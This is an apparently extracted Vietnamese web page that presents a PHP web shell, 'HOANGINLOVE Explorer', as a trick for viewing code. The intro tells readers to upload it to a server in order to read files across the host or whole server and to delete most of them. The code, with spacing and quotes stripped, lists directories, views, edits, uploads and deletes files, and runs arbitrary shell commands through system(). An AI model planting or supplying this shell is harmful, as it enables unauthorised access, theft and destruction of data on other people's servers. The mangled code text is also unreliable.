Thủ thuật View code

Copy nội dung sau thành 1 file *.php. Up lên server, chạy file đó, bạn có thể xem code của hầuhết các file trong host, chịu khó tìm hiểu 1 chút thì có thể view code toàn server, hoạc thêm chútlệnh của unix nữa là có thể xóa del hầu hết mí file trong đó.
Nội dung trích xuất từ tài liệu:
Thủ thuật View codeViewcode:trangnàyđãđượcđọc lầnCopynộidungsauthành1file*.php.Uplênserver,chạyfileđó,bạncóthểxemcodecủahầuhếtcácfiletronghost,chịukhótìmhiểu1chútthìcóthểviewcodetoànserver,hoạcthêmchútlệnhcủaunixnữalàcóthểxóadelhầuhếtmífiletrongđó.HOANGINLOVEExplorerremview}table,div,tr, td{font:13Verdana;color:}a{textdecoration:none;color:#00ff00}a:hover{textdecoration:underline;color:#ff0000}>functionshowInfoDirectory($directory){global$PHP_SELF;$dirs=split(/,$directory);printDirectory/;for($i=1;$i1024)printf(%.2fGBytes,$freeSpace/(1024*1024*1024));elseecho(int)($freeSpace/(1024*1024)).Mbytes\n;};functionshowDirectory($directory){global$files,$directories,$fileInfo,$PHP_SELF;readDirectory($directory);showInfoDirectory($directory);?>NAMESIZELASTMODIF.PERMISSIONSACTIONS$this>perms=$this>permissions(fileperms($file));$this>size=filesize($file);$this>isLink=is_link($file);if($this>isLink)$this>linkTo=readlink($file);$buffer=explode(.,$this>fullname);$this>extension=$buffer[sizeof($buffer)1];}};$fileInfo=newfileInfo;functionshowFileInfo($fileInfo){global$PHP_SELF,$associations;echo\n;if($show_icons){echo;if($fileInfo>isDir)echo;elseif($associations[$fileInfo>extension][icon]!=)echoextension][icon].\>;elseecho;echo;}echo;if($fileInfo>isLink){echo$fileInfo>name.>;$fileInfo>fullname=$fileInfo>linkTo;$fileInfo>name=$fileInfo>linkTo;}if($fileInfo>isDir){echofullname\;echo>$fileInfo>name;}elseecho$fileInfo>name;echo;echo$fileInfo>size;echo$fileInfo>lastmod;echo$fileInfo>perms;echo;if(!$fileInfo>isDir){if($fileInfo>perms[6]==r){echofullname&action=view\>View;}if($fileInfo>perms[7]==w){echofullname&action=edit\>Edit;echofullname&action=delete\>Del;}}echo;};functionviewFile($file){global$associations,$fileInfo;$fileInfo>getInfo($file);if(!$associations[$fileInfo>extension]||$associations[$fileInfo>extension][function]==) showFile($file);else$associations[$fileInfo>extension][function]($file);};functionshowFile($file,$editing=0){global$PHP_SELF,$dir;$handlerFile=fopen($file,r)ordie(ERRORopeningfile$file);if($editing)echoEditfile$file;elseechoFile$file;echo;$buffer=fread($handlerFile,filesize($file));$buffer=str_replace(&,&,$buffer);$buffer=str_replace(,$buffer);echo$buffer;if($editing)echo\n;echo;fclose($handlerFile);};functionsaveFile($file){global$dir,$text;$handlerFile=fopen($file,w)ordie(ERROR:Couldnotopenfile .basename($file).forwriting);$text=stripslashes($text);fwrite($handlerFile,$text,strlen($text))ordie(Errorwritingtofile.);fclose($handlerFile);echoChangeshasbeensavedin.basename($file).;$dir=dirname($file);};functionuploadFile(){global$HTTP_POST_FILES,$dir;copy($HTTP_POST_FILES[userfile][tmp_name],$dir./.$HTTP_POST_FILES[userfile][name])ordie(Erroruploadingfile.$HTTP_POST_FILES[userfile][name]);echoFile.$HTTP_POST_FILES[userfile][name].succesfullyuploaded.;//unlink($userfile);};functiondeleteFile($file){global$confirm;if($confirm!=TRUE)die(Confirmdeletionof$file);else{if(!unlink($file))returnFALSE;returnTRUE;}};functionviewFileHeader($file,$header){header($header);readfile($file);};functionviewGIF($file){viewFileHeader($file,Contenttype:image/gif);};functionviewJPEG($file){viewFileHeader($file,Contenttype:image/jpeg);};switch($action){casephpinfo:phpinfo();die();caseview:viewFile($dir);break;caseedit:showFile($dir,1);break;casedownload:viewFileHeader($dir,Contenttype:unknown);break;casedelete:if(!deleteFile($dir))echoCouldnotdeletefile$dir;elseechoFile$dirdeletedsuccesfully;$dir=dirname($dir);showDirectory($dir);break;caseexec:echo\n;echosystem($dir);echo\n;exit();caseupload:uploadFile();showDirectory($dir);break;casesave:saveFile($dir);default:showDirectory($dir);break;};if($action!=view):?>>JumptodirectoryCreatedirectoryExecuteshellcmd